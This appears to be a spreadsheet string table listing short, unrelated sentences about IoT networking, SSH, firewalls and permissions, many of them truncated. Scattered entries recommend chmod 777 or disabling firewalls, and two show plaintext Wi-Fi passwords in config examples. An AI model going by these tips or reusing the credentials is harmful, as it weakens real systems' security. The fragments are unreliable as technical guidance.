    <t>You will not get what you want using audio fingerprinting.</t>
  </si>
  <si>
    <t>Buffer overflow exploit also explores unsafe code this way (very unlikely in Arduino, I think).</t>
  </si>
  <si>
    <t>You are setting id and secretPassword.</t>
  </si>
  <si>
    <t>Samba, FTP/SFTP, or also (if doable on windows) SSHFS.</t>
  </si>
  <si>
    <t>servers are behind a firewall.</t>
  </si>
  <si>
    <t>Besides the firewall, that appears to be exactly what you're looking for or will at least get you going.</t>
  </si>
  <si>
    <t>should be able to join a network that you can then access with a Gateway.</t>
  </si>
  <si>
    <t>Apache and SSH were unreachable and ping did not connect.</t>
  </si>
  <si>
    <t>Maybe you must set right permissions.</t>
  </si>
  <si>
    <t>There should not be a direct access.</t>
  </si>
  <si>
    <t>Privileged access to /dev/mem is required by wiringPi.</t>
  </si>
  <si>
    <t>After you set up everything, you can go on using SSH &amp; SFTP.</t>
  </si>
  <si>
    <t>It isn't possible to sniff traffic with the XBee module itself.</t>
  </si>
  <si>
    <t>The Raspberry Pi does not allow 2 bluetooth devices to be connected at once.</t>
  </si>
  <si>
    <t>Once it is bonded, you should save this bonded flag and the bonded master's bd_addr to EEPROM.</t>
  </si>
  <si>
    <t>Try installing Mcrypt for PHP.</t>
  </si>
  <si>
    <t>In your app you can use Core Bluetooth to discover and connect to the device.</t>
  </si>
  <si>
    <t>The isDefused flag is indicating that you did defuse the bomb.</t>
  </si>
  <si>
    <t>I also recommend that you do this locally and not through SSH.</t>
  </si>
  <si>
    <t>So no cloud connection is required.</t>
  </si>
  <si>
    <t>Very unsafe also.</t>
  </si>
  <si>
    <t>Have you tried setting the permissions of the  and lampon.py to 777?</t>
  </si>
  <si>
    <t>Once you have a working VPN tunnel between your home network and your smartphone, just use a Remote Control App to shut Kodi down cleanly.</t>
  </si>
  <si>
    <t>It's possible that your firewall (e.g.</t>
  </si>
  <si>
    <t>They are not exposed.</t>
  </si>
  <si>
    <t>Update:
How to get SAS token?</t>
  </si>
  <si>
    <t>Update:
Do I need to use X509 certificates or is it possible to use SAS with
  this device?</t>
  </si>
  <si>
    <t>It does not need username and password,but it runs on device locally.</t>
  </si>
  <si>
    <t>I tried to access the AP of server module on my laptop.</t>
  </si>
  <si>
    <t>Google Calendar requires OAuth 2.0 authorization.</t>
  </si>
  <si>
    <t>Once that's done, you can use aws/aws-iot-device-sdk-js to test out the authorizer by using this piece of code.</t>
  </si>
  <si>
    <t>It  works fine for me with your codes.</t>
  </si>
  <si>
    <t>The psk=NONE in your second network therefore seems suspicious.</t>
  </si>
  <si>
    <t>The WiFiClientSecure.h does, and you need to set the port to 443.</t>
  </si>
  <si>
    <t>g grants all permissions.</t>
  </si>
  <si>
    <t>The app will get an exception as "Access is denied.</t>
  </si>
  <si>
    <t>If this is remote as you said are you using SSH with X forwarding?</t>
  </si>
  <si>
    <t>Run these command to generate the needed keys for ssh remote access.</t>
  </si>
  <si>
    <t>Stefan Esser (@i0n1c on twitter) just had a talk about this at a security conference.</t>
  </si>
  <si>
    <t>`sa` is the System Administrator account in Microsoft SQL Server.</t>
  </si>
  <si>
    <t>Envoy is a simple SSH task runner for PHP 5.4 or greater.</t>
  </si>
  <si>
    <t>In Unix-like operating systems, dot-file is synonymous with hidden file.</t>
  </si>
  <si>
    <t>Android runtime permissions powered by RxJava</t>
  </si>
  <si>
    <t>The Browser Exploit Against SSL/TLS is a vulnerability of the TLS 1.0 protocol discovered in 2011.</t>
  </si>
  <si>
    <t>ORA-01017: invalid username/password; logon denied</t>
  </si>
  <si>
    <t>MCrypt has not been updated since 2007</t>
  </si>
  <si>
    <t>If you set a shell option or alias in this script, it will not be propagated to a subshell.</t>
  </si>
  <si>
    <t>NSURLProtocol is available in iOS 2.0 and later with iOS and available in OS X v10.2 with Safari 1.0 installed ,available in OS X v10.2.7 and later with OSX.</t>
  </si>
  <si>
    <t>For wss, mod_ssl is also required.</t>
  </si>
  <si>
    <t>There are also 3G/GSM/Wifi antennas for scanning 3G/GSM and Wi-Fi hotspots.</t>
  </si>
  <si>
    <t>Native Facebook authentication for iOS 5+ if the user of your app has the Facebook iOS app installed.</t>
  </si>
  <si>
    <t>Native Facebook authentication if the user of your app has the Facebook Android app installed.</t>
  </si>
  <si>
    <t>Middleware that validates JsonWebTokens and set req.user.</t>
  </si>
  <si>
    <t>Each board has an 802.15.4 radio that communicates with any other board on its PAN ID, in a mesh network configuration.</t>
  </si>
  <si>
    <t>Enable Google, Facebook, Yahoo, Twitter social login with no code required.</t>
  </si>
  <si>
    <t>A file server, time server, or central lock coordinator server can be known as a leader.</t>
  </si>
  <si>
    <t>This requires Authentication Manager 8.2 or later.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a plugin for tox that can be installed from PyPI using pip.</t>
  </si>
  <si>
    <t>Applications, gateways and servers should use it to ensure interoperability.</t>
  </si>
  <si>
    <t>partial authentication
SSH File Transfer Protocol(version 0, 1, 2, 3)
packet compression: zlib, zlib@openssh.com JZlib has been used.</t>
  </si>
  <si>
    <t>The access to this cache is transparent to the user, using the same endpoint.</t>
  </si>
  <si>
    <t>NB: OAuth ships with piston for now, but you are not required to use it.</t>
  </si>
  <si>
    <t>I know we already talked about it, but here are some more things to try;
http://support.microsoft.com/kb/246896
The bottom line is when the template was installed, either its com registration failed, or it registered the wrong .dll.</t>
  </si>
  <si>
    <t>You have to enable X11 forwarding in Putty (Connections-&gt;SSH-&gt;X11) and install a X11 server on the windows side like Xming (http://sourceforge.net/projects/xming/).</t>
  </si>
  <si>
    <t>Used for loading a service, configuring endpoints, applying security settings, and starting listeners to handle incoming requests.</t>
  </si>
  <si>
    <t>Your code should be able to prevent or handle this type of exception...
Detect - Before performing any file operations, check the authorization permissions on the file, to see whether you are able to perform the desired operation.</t>
  </si>
  <si>
    <t>Assistance with identifying, locating, and installing drivers may be obtained at SuperUser, Unix &amp; Linux Exchange or in the case of server-related and enterprise-level hardware, ServerFault.</t>
  </si>
  <si>
    <t>The RAppArmor R package interfaces to a number of methods in the Linux kernel related to security restrictions and hardware limits for R processes.</t>
  </si>
  <si>
    <t>CodeIgniter lets you set as many validation rules as you need for a given field, cascading them in order, and it even lets you prep and pre-process the field data at the same time.</t>
  </si>
  <si>
    <t>Bluegiga develops and manufactures short range wireless connectivity systems, including Bluetooth modules and access servers, Wi-Fi modules, Bluetooth Smart modules as well as a licenceable embedded Bluetooth stack, iWRAP.</t>
  </si>
  <si>
    <t>For the case of HTML, you might use a library, either on the client side, or on the server side, to sanitize unsafe HTML before binding to the value and rendering it in the document.</t>
  </si>
  <si>
    <t>It directs a deployment tool to deploy a module or application with specific container options, security settings and describes specific configuration requirements.</t>
  </si>
  <si>
    <t>The reason you want to open ports on your router is to make people outside your local network access a server on your network.</t>
  </si>
  <si>
    <t>Do I need to use a mySQL database to keep track of the queue and lock/unlock status of the controls?</t>
  </si>
  <si>
    <t>I looked at the core device, and this is what I saw in the  file:
I've checked and I'm able to successfully hit the ATS endpoint using OpenSSL and the certificates that I have.</t>
  </si>
  <si>
    <t>You should access the main CAN-BUS wires and the buy a connector device so you can sniff the packets.</t>
  </si>
  <si>
    <t>Gatekeeper is a new feature in OS X Mountain Lion that helps protect users from downloading and installing malicious software.</t>
  </si>
  <si>
    <t>We may add some type of access control in the future if there is demand for user-facing applications.</t>
  </si>
  <si>
    <t>This device is in it's own private network that it makes itself and isn't reachable an external address.</t>
  </si>
  <si>
    <t>The 'trick' is getting your Galileo exposed to the Internet in such a way that it works like a proper HTTP server.</t>
  </si>
  <si>
    <t>If you could ensure that your devices are always connected to the cloud, which you can't because networks are inherently unreliable, then using device shadow would be pointless.</t>
  </si>
  <si>
    <t>My server is an asynchronous server and i know that it's necessary install cryptography on raspberry to make it works.</t>
  </si>
  <si>
    <t>I'm trying to use this API: https://www.linumiz.com/bluetooth-connectdevice-without-scanning/ to make a connection between two Raspberry PI.</t>
  </si>
  <si>
    <t>You should avoid that by excluding Proxy source IP from rule:</t>
  </si>
  <si>
    <t>Conclusion: bad (Toshiba) SD card was the reason for library getting corrupted at system restart.</t>
  </si>
  <si>
    <t>Make sure you select "Universal (Unencrypted Protocol)" for the Authentication Mode.</t>
  </si>
  <si>
    <t>Server2Go is a freeware WAMPP server-stack that runs out of the box without any installation and on write protected media.</t>
  </si>
  <si>
    <t>The server might also make this decision based on information about the particular user-agent or client.</t>
  </si>
  <si>
    <t>Is there any possible non-private API alternative for doing this, so I would be able to provide my own UI Controls for picking airplay device?</t>
  </si>
  <si>
    <t>I can't have access to the router to make it static, and the gui applications the pi comes with can't seem to handle hidden networks.</t>
  </si>
  <si>
    <t>Android USB Host + Arduino: How to communicate without rooting your Android Tablet or Phone</t>
  </si>
  <si>
    <t>vm2 is a Node.js sandbox that can run untrusted code with whitelisted Node's built-in modules.</t>
  </si>
  <si>
    <t>Keyfob type remote control devices tend to use Manchester Encoding.</t>
  </si>
  <si>
    <t>Make sure you are masquerading the VPN traffic (Clients of local VPN server) before forwarding to remove VPN server.</t>
  </si>
  <si>
    <t>This is a possible reason to see dirty flag after each unclean reboot.</t>
  </si>
  <si>
    <t>This condition could restrict connections to those with a particular attribute in the certificate.</t>
  </si>
  <si>
    <t>Sensitive code runs in a privileged environment - 
Write all of your code in JavaScript (if you want.)</t>
  </si>
  <si>
    <t>If you are logged out when your Mac is lost but the data is encrypted, your information is protected.</t>
  </si>
  <si>
    <t>The Windows Defender controlled folder access in programming Windows applications.</t>
  </si>
  <si>
    <t>TL;DR: A driver file I signed using  &amp; Verisign is still giving a Code 52 error when I install it.</t>
  </si>
  <si>
    <t>You have a couple of options for remotely controlling your device.</t>
  </si>
  <si>
    <t>Here's the skinny:
Voip.ms registration
My registration with voip.ms wasn't configured properly.</t>
  </si>
  <si>
    <t>If an object has a DACL, the system allows only the access that is explicitly allowed by the access control entries (ACEs) in the DACL.</t>
  </si>
  <si>
    <t>We also gave a lecture on SAT for the Verification Technology, Systems and Applications summer school in october 2009.</t>
  </si>
  <si>
    <t>This is further explained in the equally misnamed "OS X Code Signing In Depth":  
If using a disk image to ship an app, users should drag the app from
  the image to its desired installation location (usually /Applications)
  before launching it.</t>
  </si>
  <si>
    <t>This process involves the following steps:
Enabling deep linking to specific content in the app by adding intent filters in the app's manifest.</t>
  </si>
  <si>
    <t>I've implemented a solution using this .dll, but the .dll loading requires admin rights - so I can't use it.</t>
  </si>
  <si>
    <t>But, I am not able to do so, because wiringPi2 required sudo access, and ROS is not defined in root.</t>
  </si>
  <si>
    <t>However, if your Pi is on a trusted intranet network such as a home, it should be fine.</t>
  </si>
  <si>
    <t>Can you enable debugging on the CC2538 and have it report on the XBee module's attempts to join the network?</t>
  </si>
  <si>
    <t>Ensure GeckoDriver is having executable permission for non-root users.</t>
  </si>
  <si>
    <t>Can I protect my PHP code from theft?</t>
  </si>
  <si>
    <t>I have successfully set up an mDNS server on it for discovery using the ESP8266mDNS library.</t>
  </si>
  <si>
    <t>I can not debug it remotely, so I made my own file logging.</t>
  </si>
  <si>
    <t>Root of the web server - just to ping it to be sure it's accessible.</t>
  </si>
  <si>
    <t>Needed grant all services for root user.</t>
  </si>
  <si>
    <t>Then you can run any commands that require root access like this:</t>
  </si>
  <si>
    <t>With the Google Apps Admin Audit API you can survey the activities of all of your account's administrators.</t>
  </si>
  <si>
    <t>I made sure the power is on, agent is on, it's discoverable and etc.</t>
  </si>
  <si>
    <t>I can remote successfully in Rpi's desktop mode but in console mode I can't.</t>
  </si>
  <si>
    <t>And also you might need to overrun your Firewall settings if there are any on your Windows IoT core</t>
  </si>
  <si>
    <t>xUnique, is a pure Python script to regenerate project.pbxproj, a.k.a the Xcode project file, and make it unique and same on any machine.</t>
  </si>
  <si>
    <t>A Login Script is a batch script for fine-tuning computer workstation logins.</t>
  </si>
  <si>
    <t>You are not limited to the sign-in options above, in fact you can add any OAuth 1.0 or OAuth 2.0 provider by passing provider-specific information during the configuration step.</t>
  </si>
  <si>
    <t>sudo nano /etc/hostapd/hostapd.conf
interface=uap0
driver=nl80211
ssid=BookCLub
hw_mode=g
channel=6
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=booksbooks
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
EDIT /etc/default/hostapd, uncomment and change this:
DAEMON_CONF="/etc/hostapd/hostapd.conf"
EDIT /etc/sysctl.conf and uncomment
sudo nano /etc/sysctl.conf
net.ipv4.ip_forward=1
I then install nginx which is fine locally on the ethernet connection and apple devices.</t>
  </si>
  <si>
    <t>If a referenced URL is invalid, a custom email notification is sent to the administrator and the web site is not updated keeping the current content in use.</t>
  </si>
  <si>
    <t>A computer will be connected to the router over wifi.</t>
  </si>
  <si>
    <t>I'm using pkill lxsession; to bypass lxsession's logout confirmation dialog.</t>
  </si>
  <si>
    <t>I can ssh into the raspi and run Java programs on it.</t>
  </si>
  <si>
    <t>Are they somehow different, more untrustworthy, requiring different techniques?</t>
  </si>
  <si>
    <t>The program still says Permission denied.</t>
  </si>
  <si>
    <t>I haven't updated the firmware on the WiFi shield since I got it, and I honestly couldn't tell you what revision it's running.</t>
  </si>
  <si>
    <t>So, there is no way for me to do any port forwarding to VNC, nor SSH or anything else.</t>
  </si>
  <si>
    <t>Extra detail on what I've done so far:
Below code connects to wifi using wifi shield.</t>
  </si>
  <si>
    <t>I have tried disabling firewall but to no avail.</t>
  </si>
  <si>
    <t>It is setting the permissions of the device itself, but not the individual files on the device.</t>
  </si>
  <si>
    <t>Unfortunately, HP does not support authentication on this printer.</t>
  </si>
  <si>
    <t>On the armed intruder bell it rings for .5 seconds (500ms) and then waits 1.5s (1500ms) and repeats.</t>
  </si>
  <si>
    <t>I am using my university's wifi network to  connect to the internet and do not have access to any routers.</t>
  </si>
  <si>
    <t>I'm looking for a device to use at work when logging into windows systems.</t>
  </si>
  <si>
    <t>This device will be installed somewhere nobody can have physically access to.</t>
  </si>
  <si>
    <t>contains ip addresses of 2 raspberry-pis.</t>
  </si>
  <si>
    <t>The answer is, even running the sudo command, that the permission is denied.</t>
  </si>
  <si>
    <t>and firewall of my PC is disabled.</t>
  </si>
  <si>
    <t>firewall of PC1,PC2 and PC3 are disabled.</t>
  </si>
  <si>
    <t>* \param ul_mask Bitmask of one or more pin(s) to configure.</t>
  </si>
  <si>
    <t>They will have internet access, but will all be behind a router.</t>
  </si>
  <si>
    <t>The code works fine and seems to repeat indefinitely without any hiccups, but that doesn't mean it's legit.</t>
  </si>
  <si>
    <t>Is there an easy way to gain access to them?</t>
  </si>
  <si>
    <t>All permissions are set to full on every file.</t>
  </si>
  <si>
    <t>Response:   220 (vsFTPd 2.3.5) 
  Command:    AUTH TLS 
  Response:   234 Proceed with negotiation.</t>
  </si>
  <si>
    <t>My question is how do I set up Windows Authentication in Windows 10 IoT for Raspberry Pi?</t>
  </si>
  <si>
    <t>Since ssh-copy does not work on B and also cant be installed i used:
To transfer the key.</t>
  </si>
  <si>
    <t>However, the executable and the .ppsx file both have all permissions set to anyone.</t>
  </si>
  <si>
    <t>The program itself is already set with 777 permissions.</t>
  </si>
  <si>
    <t>I am not sure if Windows IoT has more functionality exposed?</t>
  </si>
  <si>
    <t>So my hope is to build RethinkDB on my host machine for the Intel Galileo.</t>
  </si>
  <si>
    <t>To connect through mobile this is usually is the setting:
SSID:PanLAN 
EAP methode : PEAP 
Phase 2 authentication: None 
Ca Certificate: None 
Identity: Asia-Pacific\SLAIK 
password: Badonkadong
I took the edurom.ino from joostd's github and tried to run it.</t>
  </si>
  <si>
    <t>I've been trying to SSH to my RPi from an external network for a while with little luck.</t>
  </si>
  <si>
    <t>(Verified MAC address by running AT+RADD? )</t>
  </si>
  <si>
    <t>Or is it more related with permission configuration?</t>
  </si>
  <si>
    <t>Now this is working, i want to now send hijack the controller of this tank i have bought.</t>
  </si>
  <si>
    <t>What I've tried so far is to attempt a hotspot using Connectify but there's been no luck there.</t>
  </si>
  <si>
    <t>The folder appears to grant full permissions.</t>
  </si>
  <si>
    <t>If i set authentication, i am unable to connect.</t>
  </si>
  <si>
    <t>I can't setup passwordless access to Raspberry Pi.</t>
  </si>
  <si>
    <t>The second one runs a script to shutdown the system, but IT IS NOT WORKING.</t>
  </si>
  <si>
    <t>I am running a windows 10 host machine which is connected to a raspberry pi over SSH.</t>
  </si>
  <si>
    <t>Now I am wondering if I have to configure the ssh-key withing the docker container (for the Jenkins user?).</t>
  </si>
  <si>
    <t>I need some help with Background worker.</t>
  </si>
  <si>
    <t>I/Binder:311_6: type=1400 audit(0.0:76): avc: denied { ptrace } for scontext=u:r:system_server:s0 tcontext=u:r:priv_app:s0:c512,c768 tclass=process permissive=1
09-19 17:17:57.909 240-240/?</t>
  </si>
  <si>
    <t>To do this may be httpserver could be exposed on the softAP interface.</t>
  </si>
  <si>
    <t>If yes, the code in the USB permission action will be executed.</t>
  </si>
  <si>
    <t>I also bought a ESP8266 Wemos D1 Mini to connect to this broker in a secure way.</t>
  </si>
  <si>
    <t>CheckList:
User have access to installing the apps.</t>
  </si>
  <si>
    <t>And i need configure wifi connection, for example.</t>
  </si>
  <si>
    <t>I experienced an strange error in  when I use .htaccess (AuthType Basic) within chromium.</t>
  </si>
  <si>
    <t>As, lib header listed Machine as Intel 80386.</t>
  </si>
  <si>
    <t>I think all traffic going out to eth1 at default.</t>
  </si>
  <si>
    <t>One in which I do not have to login to the router's admin interface (and preferably needs little to no intervention from the IT Department).</t>
  </si>
  <si>
    <t>I have enabled my Raspberry Pi 3 firewall for the port I use.</t>
  </si>
  <si>
    <t>I allowed Unity in my firewall, tried running it in Admin, still nothing.</t>
  </si>
  <si>
    <t>I used Aws IoT Device management to register my laptop as a device and run a node js script on my laptop.</t>
  </si>
  <si>
    <t>Why didnt setting the new user account and privs work?</t>
  </si>
  <si>
    <t>I also granted the user all privileges to connect to the server.</t>
  </si>
  <si>
    <t>The display should show all alarms that have been set with Alexa.</t>
  </si>
  <si>
    <t>I tried exposing port 22, to no avail.</t>
  </si>
  <si>
    <t>I am working on Dev kit example Remote Monitoring.</t>
  </si>
  <si>
    <t>E/Zygote: isWhitelistProcess -
  Process is Whitelisted 2019-02-07 19:03:46.036 18008-18008/?</t>
  </si>
  <si>
    <t>Below is the pin configuration along with my code.</t>
  </si>
  <si>
    <t>But still there is nothing suspicious in my logs.</t>
  </si>
  <si>
    <t>When I try to deploy, I get error: 
Failed to connect to device '192.168.1.17' using Universal Authentication.</t>
  </si>
  <si>
    <t>I have an Apache2 site set up on a RPI3 with basic authentication.</t>
  </si>
  <si>
    <t>So how can I update Spyder?</t>
  </si>
  <si>
    <t>I have also configured the Device Type and Device ID.</t>
  </si>
  <si>
    <t>: The user and the file have privileges to do it
And I already set chmod 777 the file</t>
  </si>
  <si>
    <t>The reboot is because I configured a watchdog to do so.</t>
  </si>
  <si>
    <t>I also set up a Cognito Identity Pool with my Cognito User Pool as the one and only Authentication Provider.</t>
  </si>
  <si>
    <t>do I need to explicitly advertise the iOS device from the app?</t>
  </si>
  <si>
    <t>I have quetion about proper configuration certificates in Auzre's IoT Hub.</t>
  </si>
  <si>
    <t>Master will be hardwired to ethernet while the remotes will need to be wifi.</t>
  </si>
  <si>
    <t>I don't know why you're getting permission denied for , but if you use sudo crontab -e -u pi, then you will be able to open the crontab for the pi user with sudo.</t>
  </si>
  <si>
    <t>Is the network connection OK (eg firewall)?</t>
  </si>
  <si>
    <t>in hardware serial you configured for particular pin as Tx and Rx pin.</t>
  </si>
  <si>
    <t>so that you can ignore the permissions you have set, and then run:</t>
  </si>
  <si>
    <t>The https server will proxy all traffic to localhost:8080.</t>
  </si>
  <si>
    <t>The only interaction between the browser and your server is HTTP, unless there's a gigantic security hole in your server.</t>
  </si>
  <si>
    <t>Access restrictions to files and directories.</t>
  </si>
  <si>
    <t>Just install it as the default JCE provider before you try to connect with SSHJ (untested).</t>
  </si>
  <si>
    <t>I have read that it is because google requires https for all communication.</t>
  </si>
  <si>
    <t>Key in
and wait for the device to shut down.</t>
  </si>
  <si>
    <t>Managed to install an unofficial runner.</t>
  </si>
  <si>
    <t>You can proxy the network traffic, if that's what you are looking for.</t>
  </si>
  <si>
    <t>May be eth0 has two IP address configured 192.168.1.2 and 192.168.1.18.</t>
  </si>
  <si>
    <t>The only "remote" ways are :
Powershell
SSH
Web Interface
Paolo.</t>
  </si>
  <si>
    <t>It's failing to talk to your Pi via SSH protocol.</t>
  </si>
  <si>
    <t>Your interface might be eth0 instead of wlan0.</t>
  </si>
  <si>
    <t>Therefore it's inaccessible/restricted.</t>
  </si>
  <si>
    <t>(Yes I did restart them just to be safe)
Cause?</t>
  </si>
  <si>
    <t>You need to be root or run your program with sudo in order to use the GPIO pins.</t>
  </si>
  <si>
    <t>You could exchange ssh keys in a way your openelec root can issue the mount command on the remote server and the remote server can mount sshfs dirs of openelec.</t>
  </si>
  <si>
    <t>This AT firmware can be updated OTA when it is connected to internet.</t>
  </si>
  <si>
    <t>Most routers use basic authentication.</t>
  </si>
  <si>
    <t>You probably have a firewall running on your computer.</t>
  </si>
  <si>
    <t>You can use sudo chown -R YOURUSERNAME:YOURUSERNAME /auto/ccache/ to set proper access permissions.</t>
  </si>
  <si>
    <t>In order for two devices to communicate, a network is needed.</t>
  </si>
  <si>
    <t>It supports MQTT, easy wifi configuration and Over The Air (OTA) firmware update.</t>
  </si>
  <si>
    <t>I was then able to install:
Pycrypto
Paramiko
PySFTP</t>
  </si>
  <si>
    <t>However they are not exposed when you select IoT Hub as input in ASA.</t>
  </si>
  <si>
    <t>Remote debugging is also possible.</t>
  </si>
  <si>
    <t>A Pairwise Transient Key secures the unicast traffic.</t>
  </si>
  <si>
    <t>Anyway, the LCD is sensitive to electromagnetic interference.</t>
  </si>
  <si>
    <t>You could use a (non-Python) utility like nmap (nmap.org) to port scan and it can do "os fingerprinting".</t>
  </si>
  <si>
    <t>You can configure device certificates (e.g., see here) - but I haven't discussed these as - hopefully!</t>
  </si>
  <si>
    <t>The activation is all done locally.</t>
  </si>
  <si>
    <t>This can be accessed with user privileges via the virtual files in that file system.</t>
  </si>
  <si>
    <t>code fails because the app runs sandboxed and the NSURL can't be accessed</t>
  </si>
  <si>
    <t>Possibly the firewall on the Raspberry Pi is still on.</t>
  </si>
  <si>
    <t>In ios device go to General -&gt; About -&gt; Certificate Trust Setting And enable to trust the certificate.</t>
  </si>
  <si>
    <t>Other flags such as "-disable-infobars" will also not work.</t>
  </si>
  <si>
    <t>This is not a secure way to connect and should be avoided if possible.</t>
  </si>
  <si>
    <t>Links have permissions set to lrwxrwxrwx.</t>
  </si>
  <si>
    <t>here is the code that I use with the Realtime database without security configuration.</t>
  </si>
  <si>
    <t>You will also need to get your broker set up and again, handle security.</t>
  </si>
  <si>
    <t>Once your device is connected with a WiFi router.</t>
  </si>
  <si>
    <t>CATIA has COM Automation exposed (i.e.</t>
  </si>
  <si>
    <t>I disable the firewall and then it worked.</t>
  </si>
  <si>
    <t>ADC2 pins can not be used when Wi-Fi or Bluetooth is used.</t>
  </si>
  <si>
    <t>I switched to a WPA2-PSK network, which only requires a password and it worked.</t>
  </si>
  <si>
    <t>If you device is going to run arbitrary untrusted then (e.g.</t>
  </si>
  <si>
    <t>Fluent Security configuration for ASP.NET MVC</t>
  </si>
  <si>
    <t>Most often the forwarding is done through a ssh tunnel.</t>
  </si>
  <si>
    <t>login-required refers to `login_required` django view decorator</t>
  </si>
  <si>
    <t>Redfang is a tool for discovering hidden bluetooth devices</t>
  </si>
  <si>
    <t>repoze.who is an identification and authentication framework for arbitrary WSGI applications.</t>
  </si>
  <si>
    <t>Wait, I thought we blacklisted Google.</t>
  </si>
  <si>
    <t>ipfw is  FreeBSD firewall and is built-in  Mac OS X and DragonFly BSD .</t>
  </si>
  <si>
    <t>Bitcoin testnet is an alternative blockchain, used for testing.</t>
  </si>
  <si>
    <t>Toree provides applications with a mechanism to interactively and remotely access Apache Spark.</t>
  </si>
  <si>
    <t>A firewall is a network security device or software.</t>
  </si>
  <si>
    <t>Peers are equally privileged, equipotent participants in the application.</t>
  </si>
  <si>
    <t>CleverHans is a Python library to benchmark machine learning systems' vulnerability to adversarial examples.</t>
  </si>
  <si>
    <t>SharpSSH is a .NET framework library for connecting to and retrieving files from an SSH/SFTP server.</t>
  </si>
  <si>
    <t>an authentication, authorization and accounting protocol for computer networks, and an alternative to RADIUS</t>
  </si>
  <si>
    <t>Diameter is an authentication, authorization and accounting protocol for computer networks, and an alternative to RADIUS</t>
  </si>
  <si>
    <t>The OAuth 2.0 playground is also integrated with Google Drive.</t>
  </si>
  <si>
    <t>Default configuration of protocols and Applications.</t>
  </si>
  <si>
    <t>The storage emulator connects to SQL Server or LocalDB using Windows authentication.</t>
  </si>
  <si>
    <t>Access the Internet from behind a restrictive firewall.</t>
  </si>
  <si>
    <t>login-required refers to login_required django view decorator.</t>
  </si>
  <si>
    <t>Redfang is a tool for discovering hidden bluetooth devices.</t>
  </si>
  <si>
    <t>Please see the section above on user IDs and login for details.</t>
  </si>
  <si>
    <t>ipfw is  FreeBSD firewall and is built-in  Mac OS X and DragonFly BSD.</t>
  </si>
  <si>
    <t>To do so, bind to an explicitly trusted value via $sce.trustAsHtml.</t>
  </si>
  <si>
    <t>MySQL provides fine-grained access control (FGAC).</t>
  </si>
  <si>
    <t>Simple IP Filtering.</t>
  </si>
  <si>
    <t>Cocotb is a COroutine based COsimulation TestBench environment for verifying vhdl/verilog RTL using python.</t>
  </si>
  <si>
    <t>About
Toree provides applications with a mechanism to interactively and remotely access Apache Spark.</t>
  </si>
  <si>
    <t>Why isn't the L flag working in my .htaccess file?</t>
  </si>
  <si>
    <t>(Authorization is required for all user interactions.)</t>
  </si>
  <si>
    <t>This requires Authentication Manager version 8.0 or later.</t>
  </si>
  <si>
    <t>Safari app extensions are available in OS X 10.12 and later and in OS X 10.11.5 when Safari 10 is installed.</t>
  </si>
  <si>
    <t>Guardian remains a functional system.</t>
  </si>
  <si>
    <t>It's used in systems like Amazon Alexa and Actions on Google, for example during their OAuth 2.0 flows.</t>
  </si>
  <si>
    <t>Keytool is a key and certificate management utility.</t>
  </si>
  <si>
    <t>Source:  Wikipedia (Secure copy)</t>
  </si>
  <si>
    <t>Related tag: acl
Filesystem permissions on Wikipedia</t>
  </si>
  <si>
    <t>The username and password must be the same as was
  specified in a GRANT CONNECT statement.</t>
  </si>
  <si>
    <t>"Google Voice" home(ish) page (doesn't require a login).</t>
  </si>
  <si>
    <t>Safari 4-: Supported after installing SIMBL and GreaseKit.</t>
  </si>
  <si>
    <t>For example, restricting access from specific IP such as 127.0.0.1.</t>
  </si>
  <si>
    <t>We need you to look for suspicious voting patterns.</t>
  </si>
  <si>
    <t>I figured out from the error message that it doesn't auto login when run from the bash prompt (it does this fine from idle).</t>
  </si>
  <si>
    <t>I'm using syslog-ng to write the logs of a cisco pix firewall with a raspberry pi.</t>
  </si>
  <si>
    <t>For this, the Arduino needs a WiFi module to access the router.</t>
  </si>
  <si>
    <t>But I'm not sure how to get the IP of the Raspberry (without having access to the router), that I need to connect to it.</t>
  </si>
  <si>
    <t>I'll already tried setting a username/password, i.e.</t>
  </si>
  <si>
    <t>I also put down my firewall but this didn't help.</t>
  </si>
  <si>
    <t>Obviously I don't want to be able to access the R-Pi's whole file system, so is there somewhere where I need to whitelist what can be seen from the client?</t>
  </si>
  <si>
    <t>problem:
 sim300 doesnt detect the simcard , harware malfunction, i have ordered a new one.</t>
  </si>
  <si>
    <t>I would like to remote into my Pi from outside my home network.</t>
  </si>
  <si>
    <t>G'day,
I'm using  to lock my RPi, which works fine.</t>
  </si>
  <si>
    <t>I believe I have all the permissions set correctly.</t>
  </si>
  <si>
    <t>I don't think i need a handshake, as the guy on YouTube used this exact code and it worked fine.</t>
  </si>
  <si>
    <t>Now the code works with my windows machine running an SSH server.</t>
  </si>
  <si>
    <t>I then just tried to run the same command in the terminal window 
/usr/bin/sudo ~/FDRT/stopclock.py
this returns the same permission denied error.</t>
  </si>
  <si>
    <t>I have configured a MasterCard Debit card in PassBook.</t>
  </si>
  <si>
    <t>firewalls are deactivated.</t>
  </si>
  <si>
    <t>I tried first setting it up to not require a password, then tried to create a user and password to access it.</t>
  </si>
  <si>
    <t>I can SSH into the machine from outside local.</t>
  </si>
  <si>
    <t>I'm getting invalid channel errors when running my code.</t>
  </si>
  <si>
    <t>I connect to the remote device using Enter-PSSession.</t>
  </si>
  <si>
    <t>I checked with another PC via ssh.But it's worked fine I don't know why.</t>
  </si>
  <si>
    <t>But I've found out, that there is no SSH2-Module installed.</t>
  </si>
  <si>
    <t>I configured my RPi from a NOOBS SD from scratch - works fine - then I did a reboot and suddenly it asks for a login and nothing I try works.</t>
  </si>
  <si>
    <t>Is it really unsafe to get this data the way I did it?</t>
  </si>
  <si>
    <t>Both, the ip scanner and the WiFi router both recognize several raspberrys and other devices like airport express.</t>
  </si>
  <si>
    <t>I have a nodejs/expressjs backend service and I wish to register my devices using an endpoint.</t>
  </si>
  <si>
    <t>The whole thing is working fine on Audacity for example.</t>
  </si>
  <si>
    <t>Using Terminal on Mac, I can remotely ssh into the RPi and then connect to the server.</t>
  </si>
  <si>
    <t>I have bought a GT-511C1R fingerprint scanner, to work in combination with my Arduino Mega.</t>
  </si>
  <si>
    <t>CODE IS GOOD, working without Firewall
this is the code.</t>
  </si>
  <si>
    <t>So I decide to set password on Raspberry pi but I don't know how ?</t>
  </si>
  <si>
    <t>First tought was a Firewall Problem.</t>
  </si>
  <si>
    <t>I have also tried de-activating my firewall but no use.</t>
  </si>
  <si>
    <t>"));
  // initializeESP8266() verifies communication with the WiFi
  // shield, and sets it up.</t>
  </si>
  <si>
